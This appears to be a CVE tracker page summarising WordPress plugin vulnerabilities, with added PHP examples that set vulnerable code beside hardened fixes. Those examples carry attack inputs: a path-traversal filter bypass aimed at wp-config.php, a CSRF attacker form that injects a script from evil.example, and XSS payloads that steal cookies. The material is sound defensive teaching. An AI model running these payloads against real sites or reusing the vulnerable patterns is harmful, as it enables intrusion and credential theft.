18 CVEs tracked today. 0 Critical, 1 High, 17 Medium, 0 Low.
-
CVE-2025-64284
HIGH
CVSS 7.5
Local file inclusion in the Majestic Support WordPress plugin (versions up to and including 1.0.7) lets authenticated attackers with low privileges include arbitrary PHP files from the server filesystem, because a request-controlled filename reaches an include/require statement (CWE-98). The CVSS 7.5 (High) rating reflects high attack complexity set against a potential complete loss of confidentiality, integrity and availability. The EPSS score of 0.10% (28th percentile) suggests a low probability of mass exploitation. No public exploit code was identified and the issue was not in CISA KEV at the time of analysis, though Patchstack tracking indicates the vendor is aware.
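The include/require pattern behind this entry, the "strip ../" pseudo-fix and its bypass, and an allowlist-based resolver, shown as an added example. This is not Majestic Support's code and not a proof of concept for this CVE; the directory layout, the view names and the ?view= parameter are assumptions for illustration, and the throwaway files it creates are constructed.

```php
<?php
// Added example (not Majestic Support's code, not a Patchstack proof of concept):
// the include/require pattern behind CWE-98, the "strip ../" pseudo-fix and how
// it is bypassed, and an allowlist resolver. Plain PHP 8, no WordPress needed:
//   php lfi_example.php
declare(strict_types=1);

// VULNERABLE: a request-controlled view name is concatenated into include().
// ?view=../wp-config lands in include() as views/../wp-config.php. Combined with
// any upload primitive, an attacker-supplied .php under uploads/ runs the same way.
function view_path_vulnerable(string $viewsDir, string $view): string
{
    return $viewsDir . '/' . $view . '.php';      // what include() would receive
}

// NAIVE FIX: delete "../" once. "....//" survives as "..//", still a traversal.
function view_path_naive(string $viewsDir, string $view): string
{
    return $viewsDir . '/' . str_replace('../', '', $view) . '.php';
}

// HARDENED: the name must be on an allowlist AND resolve inside the views directory.
// Returns null so the caller can 404 and log instead of including anything.
function resolve_view(string $viewsDir, string $view, array $allowed): ?string
{
    if (!in_array($view, $allowed, true)) {
        return null;
    }
    $base = realpath($viewsDir);
    $path = realpath($viewsDir . '/' . $view . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

// Demo on a constructed throwaway tree: <tmp>/views/tickets.php and <tmp>/wp-config.php.
$root  = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
$views = $root . '/views';
mkdir($views, 0700, true);
file_put_contents($views . '/tickets.php', "<?php echo 'tickets view';\n");
file_put_contents($root . '/wp-config.php', "<?php // DB_PASSWORD would live here\n");

foreach (['tickets', '../wp-config', '....//wp-config'] as $req) {
    printf("view=%-16s vulnerable -> %s\n", $req, realpath(view_path_vulnerable($views, $req)) ?: 'n/a');
    printf("%-21s naive      -> %s\n", '', realpath(view_path_naive($views, $req)) ?: 'n/a');
    printf("%-21s hardened   -> %s\n", '', resolve_view($views, $req, ['tickets']) ?? 'REJECTED');
}
// Only "tickets" passes resolve_view(); both traversal requests resolve to
// wp-config.php through the vulnerable and the naive code.

unlink($views . '/tickets.php');
unlink($root . '/wp-config.php');
rmdir($views);
rmdir($root);
```

The allowlist is the real fix; the realpath check is a second line of defence for the case where an allowlisted name is later mapped through a symlink or a renamed directory. Any filter that edits the string (removing "../", stripping null bytes) is a blocklist and should be assumed bypassable.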
PHP
LFI
File Upload
-
CVE-2025-64296
MEDIUM
CVSS 5.3
Missing authorization in the Facebook for WooCommerce plugin (versions up to 3.5.7) lets authenticated attackers bypass an access-control check and dismiss administrative notices. The flaw is a missing capability check rather than a missing login check, so the action is reachable by any logged-in account; generic descriptions of this class cite privilege escalation or information disclosure, but the action exposed here is suppressing notices meant for administrators. The low EPSS score (0.03%, 9th percentile) suggests limited real-world exploitation likelihood.
WordPress
Authentication Bypass
-
CVE-2025-64290
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) in Premmerce Product Search for WooCommerce (slug premmerce-search) allows an attacker to make a logged-in user perform plugin actions without their consent. Affects all versions up to and including 2.2.4.
WordPress
CSRF
-
CVE-2025-64289
MEDIUM
CVSS 5.9
Stored XSS in Premmerce Product Search for WooCommerce (through version 2.2.5) allows high-privilege authenticated users to inject scripts that execute in other users' browsers, including those of site visitors and administrators. Triggering the payload requires only that a victim view the affected page. EPSS exploitation probability is low (0.02%), and no public exploit code or active exploitation has been confirmed, though the attack vector is network-accessible.
PHP
WordPress
XSS
Woocommerce
-
CVE-2025-64288
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) in Premmerce (slug premmerce) allows an attacker to make a logged-in user perform plugin actions without their consent. Affects all versions up to and including 1.3.19.
CSRF
-
CVE-2025-64286
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) in WpEstate WP Rentals (slug wprentals) allows an attacker to make a logged-in user perform actions without their consent. Affects all versions up to and including 3.13.1.
CSRF
-
CVE-2025-64285
MEDIUM
CVSS 5.4
Missing Authorization in Premmerce Wholesale Pricing for WooCommerce (slug premmerce-woocommerce-wholesale-pricing) allows access to functionality whose access-control check is incorrectly configured (a missing or wrong capability check). Affects all versions up to and including 1.1.10.
WordPress
Authentication Bypass
-
CVE-2025-64234
MEDIUM
CVSS 4.3
Missing Authorization in Evergreen Content Poster (slug evergreen-content-poster) allows access to functionality whose access-control check is incorrectly configured. Affects all versions up to and including 1.4.5.
Authentication Bypass
-
CVE-2025-64226
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) in colabrio Stockie Extra (slug stockie-extra) allows an attacker to make a logged-in user perform actions without their consent. Affects all versions up to and including 1.2.11.
CSRF
-
CVE-2025-64212
MEDIUM
CVSS 5.4
Missing Authorization in StylemixThemes MasterStudy LMS Pro (slug masterstudy-lms-learning-management-system-pro) allows access to functionality whose access-control check is incorrectly configured. Affects all versions before 4.7.16.
Authentication Bypass
-
CVE-2025-64211
MEDIUM
CVSS 5.3
Missing Authorization in StylemixThemes Masterstudy Elementor Widgets (slug masterstudy-elementor-widgets) allows access to functionality not properly constrained by ACLs. Affects all versions up to and including 1.2.4.
Authentication Bypass
-
CVE-2025-64201
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) in blubrry PowerPress Podcasting (slug powerpress) allows an attacker to make a logged-in user perform plugin actions without their consent. Affects all versions up to and including 11.13.12.
CSRF
-
CVE-2025-64199
MEDIUM
CVSS 5.3
Missing Authorization in WpEstate wpresidence (slug wpresidence) allows access to functionality whose access-control check is incorrectly configured. Affects all versions up to and including 5.3.2.
Authentication Bypass
-
CVE-2025-58939
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) in highwarden Super Store Finder (slug superstorefinder-wp) allows an attacker to make a logged-in user perform plugin actions without their consent. Affects all versions up to and including 7.5.
CSRF
-
CVE-2025-58711
MEDIUM
CVSS 5.3
Missing Authorization in solwin Blog Designer PRO (slug blog-designer-pro) allows access to functionality not properly constrained by ACLs. Affects all versions up to and including 3.4.8.
Authentication Bypass
-
CVE-2025-57931
MEDIUM
CVSS 5.3
Cross-site request forgery in the Ays Pro Popup box WordPress plugin (versions up to 5.5.4) allows attackers to perform unauthorized actions, such as modifying plugin settings or creating popups, on behalf of authenticated administrators without their knowledge. The attack requires the victim to load an attacker-controlled page (for example by clicking a link) while logged in, and the browser attaches the session cookie to the forged request. EPSS is 0.02% (4th percentile), suggesting limited real-world attack pressure despite the theoretical risk.
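The mechanism this entry describes, an attacker page submitting a plugin settings form with the victim administrator's cookies, and the WordPress nonce plus capability check that closes it, as an added example. This is not the Popup box plugin's code: the demo_ action, option and nonce names are hypothetical, the attacker page is constructed, and the block assumes it is loaded by WordPress so that the wp_*, check_* and add_action calls are the core APIs.

```php
<?php
/*
 * Added example, not code from the Popup box plugin or any vendor on this page.
 * Shows the CSRF pattern the advisories describe on a hypothetical settings
 * page (prefix "demo_"), then the hardened handler. Assumes it runs inside
 * WordPress; every wp_* / check_* function used is WordPress core.
 */

// ---- VULNERABLE: settings saved on the strength of the login cookie alone -----
// admin-post.php routes ?action=demo_save_settings_vuln here for any logged-in
// user. Nothing proves the request came from the plugin's own form.
add_action('admin_post_demo_save_settings_vuln', function () {
    update_option('demo_popup_title', wp_unslash($_POST['title'] ?? ''));
    wp_safe_redirect(admin_url('admin.php?page=demo-popup'));
    exit;
});

// Attacker's page (constructed, served from any origin the victim can browse):
//   <form method="post" action="https://victim.example/wp-admin/admin-post.php">
//     <input type="hidden" name="action" value="demo_save_settings_vuln">
//     <input type="hidden" name="title" value="<script src=//evil.example/x.js></script>">
//   </form><script>document.forms[0].submit()</script>
// The browser sends the admin's cookies with it; the title is now stored XSS.

// ---- HARDENED: capability check binds the action to a role, nonce binds the
// request to this user and this action. Both are needed: admin_post_* fires for
// every logged-in user, so a nonce alone still lets a Subscriber who can obtain
// one (e.g. from a page that prints it) call the handler.
add_action('admin_post_demo_save_settings', function () {
    if (!current_user_can('manage_options')) {
        wp_die(esc_html__('Insufficient permissions.'), '', ['response' => 403]);
    }
    check_admin_referer('demo_save_settings', 'demo_nonce'); // wp_die()s on a bad/missing nonce
    $title = sanitize_text_field(wp_unslash($_POST['title'] ?? ''));
    update_option('demo_popup_title', $title);
    wp_safe_redirect(add_query_arg('updated', '1', admin_url('admin.php?page=demo-popup')));
    exit;
});

// The plugin's own form must embed the matching nonce; the attacker's form cannot.
function demo_render_settings_form(): void
{
    ?>
    <form method="post" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
        <input type="hidden" name="action" value="demo_save_settings">
        <?php wp_nonce_field('demo_save_settings', 'demo_nonce'); ?>
        <label>Popup title
            <input type="text" name="title"
                   value="<?php echo esc_attr(get_option('demo_popup_title', '')); ?>">
        </label>
        <?php submit_button(); ?>
    </form>
    <?php
}
```

WordPress nonces are per user, per action and time-limited, so the attacker's page cannot forge one; the capability check is what stops the "nonce obtained by a low-privilege account" case. The same two checks apply to AJAX handlers (check_ajax_referer) and to REST routes (a permission_callback plus the X-WP-Nonce header).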
CSRF
-
CVE-2025-49042
MEDIUM
CVSS 5.9
Stored cross-site scripting (XSS) in Automattic WooCommerce through version 10.0.2 allows attackers to inject scripts that persist in the application and execute in other users' browsers. The flaw stems from improper neutralization of input during web page generation (CWE-79): an authenticated lower-privileged user can compromise the storefront and potentially steal customer data or perform actions in the browser of an administrator who views the injected content.
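The stored-XSS pattern described here and in the Premmerce entry above, as an added example that is not WooCommerce's or Premmerce's code: a hypothetical store-notice setting (demo_ option names are assumptions) written by a lower-privileged user and rendered to every visitor, first unescaped and then with sanitisation on input and context-specific escaping on output. The block assumes it runs inside WordPress.

```php
<?php
/*
 * Added example, not WooCommerce's or Premmerce's code. A hypothetical "store
 * notice" (option prefix demo_) that a low-privilege user can set and every
 * visitor sees. Assumes WordPress is loaded; the esc_* / wp_kses_* functions
 * are WordPress core.
 */

// ---- VULNERABLE: raw input stored, raw output rendered --------------------------
function demo_save_notice_vuln(string $text, string $link): void
{
    update_option('demo_notice_text', $text);   // e.g. <img src=x onerror=alert(document.cookie)>
    update_option('demo_notice_link', $link);   // e.g. javascript:alert(1)
}

function demo_render_notice_vuln(): string
{
    // Every storefront page, and the admin's dashboard widget, now executes the payload.
    return '<a href="' . get_option('demo_notice_link') . '">'
         . get_option('demo_notice_text') . '</a>';
}

// ---- HARDENED ------------------------------------------------------------------
function demo_save_notice(string $text, string $link): void
{
    // Input: keep the post-safe HTML subset for the body, a validated URL for the link.
    update_option('demo_notice_text', wp_kses_post($text));
    update_option('demo_notice_link', esc_url_raw($link));
}

function demo_render_notice(): string
{
    // Output: escape for the context each value lands in.
    //   esc_url()     for href/src  (drops javascript:, data: and other disallowed schemes)
    //   wp_kses_post  for rich-text nodes (strips onerror=, <script>, etc.)
    //   esc_html()    for plain-text nodes, esc_attr() for attribute values
    // esc_attr() alone in href would NOT stop javascript: URLs; the scheme is valid HTML.
    return sprintf(
        '<a href="%s">%s</a>',
        esc_url(get_option('demo_notice_link', '')),
        wp_kses_post(get_option('demo_notice_text', ''))
    );
}
```

Sanitising on input is defence in depth; the escaping at output is what neutralises the payload, because the stored value may be rewritten by another code path (an import, a REST route, a database migration) that never ran the input filter. Run the unescaped version through the same payloads to confirm the difference: with the hardened pair the onerror attribute and the javascript: URL never reach the page.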
WordPress
XSS
-
CVE-2025-11705
MEDIUM
CVSS 6.5
Arbitrary file read in the Anti-Malware Security and Brute-Force Firewall WordPress plugin (versions up to 4.23.81) allows authenticated Subscriber-level users to read sensitive files from the server through unprotected AJAX endpoints. Several GOTMLS_* AJAX actions lack capability checks and return file contents, so any account that can log in can read arbitrary files, including configuration files such as wp-config.php and the credentials they hold. No public exploit code has been confirmed at this time, but the low privilege requirement makes exploitation straightforward.
WordPress
Authentication Bypass
Information Disclosure